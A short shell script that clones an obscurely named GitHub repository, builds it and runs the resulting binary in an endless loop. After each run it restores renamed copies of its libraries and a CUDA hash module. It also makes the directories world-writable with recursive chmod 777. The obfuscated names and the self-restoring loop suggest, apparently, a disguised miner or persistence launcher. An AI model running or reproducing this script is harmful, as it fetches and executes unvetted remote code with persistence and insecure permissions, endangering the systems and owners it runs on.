git clone https://github.com/mobileapps84741274/linux884
cd ./linux884/
mkdir build
cd build
cmake ..
make

chmod 777 -R ./

chmod 777 -R ../

cp ./modules/cuda_linux8474.hsh ./cuda_linux8474.hsh

cp ./liblinux8474.so ./liblinux84744474.so

cp ./libcommon.so ./libcommon8474.so

cp ./linux848888888874 ./linux8488888888744474

while true
do

./linux848888888874

cp ./cuda_linux8474.hsh ./modules/cuda_linux8474.hsh

cp ./liblinux84744474.so ./liblinux8474.so

cp ./libcommon8474.so ./libcommon.so

cp ./linux8488888888744474 ./linux848888888874

done
